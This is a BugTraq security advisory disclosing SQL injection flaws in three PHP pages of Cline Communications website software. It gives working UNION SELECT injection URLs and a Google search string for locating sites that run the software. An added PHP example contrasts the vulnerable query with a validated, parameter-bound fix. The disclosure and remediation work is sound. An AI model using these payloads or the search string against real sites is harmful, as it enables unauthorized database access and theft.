BugTraq
Cline Communications Sql injection Jun 17 2006 01:16PM
liz0 bsdmail com
Cline Communications Sql injection

-------------------------------------

Site:http://www.celerondude.com/

Demo:http://www.liveelite.com/

---------------------------------

SQL injection

1. photo_enlarged.php file, Photo_ID parameter

2. newsdetail.php file, NID parameter

3. staff_photo_enlarged.php file, Staff_ID parameter

http://website/photo_enlarged.php?Photo_ID='sql

http://website/newsdetail.php?NID='sql

http://website/staff_photo_enlarged.php?Staff_ID='sql

Example:

http://localhost/staff_photo_enlarged.php?Staff_ID=-1+union+select+1,2,3,4,5,6+from+Staff

http://localhost/photo_enlarged.php?Photo_ID=-1+union+select+1,2,3,4,5,6,7,8,9,1+from+PHOTO

http://localhost/newsdetail.php?NID=-1+union+select+1,2,3,4,5+from+News

http://localhost/newsdetail.php?NID=-1+union+select+News_date,news_id,3,news_date,5+from+News

-----------------------------------------

Credit:Liz0ziM

E-mail:liz0 (at) bsdmail (dot) com

Site:www.biyo.tk www.biyosecurity.be

Greetz: All my friends

-----------------------------------------

Google:

"This site powered by Cline Communications"

-----------------------------------------

Source:

http://www.blogcu.com/Liz0ziM/714903/

http://liz0zim.no-ip.org/cline.txt

http://biyosecurity.be/bugs/cline.txt
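
All three parameters listed above appear to be numeric record identifiers, so the fix is to accept only integers and bind the value instead of concatenating it into the query. The PHP below is an added example, not Cline Communications code and not part of the advisory: the in-memory SQLite table, the columns other than news_id and News_date, and both function names are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Constructed in-memory stand-in for the News table named in the advisory.
// Columns other than news_id and News_date are assumptions.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE News (news_id INTEGER PRIMARY KEY, News_date TEXT, title TEXT, body TEXT, author TEXT)');
$db->exec("INSERT INTO News VALUES (1, '2006-06-01', 'Launch', 'Site is live', 'admin')");

// Assumed vulnerable pattern: the raw parameter is concatenated into the SQL text.
function news_vulnerable(PDO $db, string $nid): array
{
    return $db->query('SELECT * FROM News WHERE news_id = ' . $nid)->fetchAll(PDO::FETCH_NUM);
}

// Hardened: reject anything that is not a positive integer, then bind it.
function news_hardened(PDO $db, string $nid): array
{
    $id = filter_var($nid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];   // caller should answer 400/404 rather than echo a database error
    }
    $stmt = $db->prepare('SELECT * FROM News WHERE news_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// NID value from the advisory's example URL, after URL decoding ("+" becomes a space).
$payload = '-1 union select News_date,news_id,3,news_date,5 from News';

foreach (['1', $payload, "'sql"] as $nid) {
    try {
        $v = count(news_vulnerable($db, $nid)) . ' row(s)';
    } catch (PDOException $e) {
        $v = 'SQL error';   // the quote probe breaks the concatenated statement
    }
    printf("%-60s vulnerable: %-10s hardened: %d row(s)\n", $nid, $v, count(news_hardened($db, $nid)));
}
```

The same validate-then-bind handling applies to Photo_ID and Staff_ID; the script needs PHP with the pdo_sqlite extension.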
